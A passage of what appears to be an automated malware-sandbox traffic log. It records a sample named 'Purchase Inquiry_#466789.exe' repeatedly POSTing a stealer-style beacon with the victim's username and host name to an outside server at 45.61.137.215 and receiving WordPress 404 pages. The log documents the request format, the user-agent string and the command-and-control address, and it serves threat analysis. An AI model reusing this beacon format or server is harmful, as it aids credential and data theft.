                  Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                  May 27, 2024 08:33:14.786859989 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                  Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                  May 27, 2024 08:33:14.786895037 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:14.786914110 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:14.786935091 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:14.786957979 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.44977145.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:14.951788902 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:14.957004070 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:17.072299957 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:15 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:17.072321892 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:17.072339058 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:17.072349072 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                  Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                  May 27, 2024 08:33:17.072365999 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                  Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                  May 27, 2024 08:33:17.072376013 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                  Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                  May 27, 2024 08:33:17.072510004 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:17.072572947 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:17.072583914 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:17.072725058 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.44977245.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:17.259500027 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:17.265038967 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:19.423681021 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:17 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:19.423752069 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:19.423805952 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:19.423870087 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                  Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                  May 27, 2024 08:33:19.423918962 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                  Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                  May 27, 2024 08:33:19.423968077 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                  Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                  May 27, 2024 08:33:19.424015999 CEST1236INData Raw: 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64
                  Data Ascii: near-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(13
                  May 27, 2024 08:33:19.424063921 CEST1236INData Raw: 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74
                  Data Ascii: ed: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .
                  May 27, 2024 08:33:19.424110889 CEST1236INData Raw: 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72
                  Data Ascii: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-c
                  May 27, 2024 08:33:19.424144983 CEST1236INData Raw: 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d
                  Data Ascii: rtant;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.44977345.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:19.575651884 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:19.581087112 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:21.748455048 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:20 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:21.748539925 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:21.748595953 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
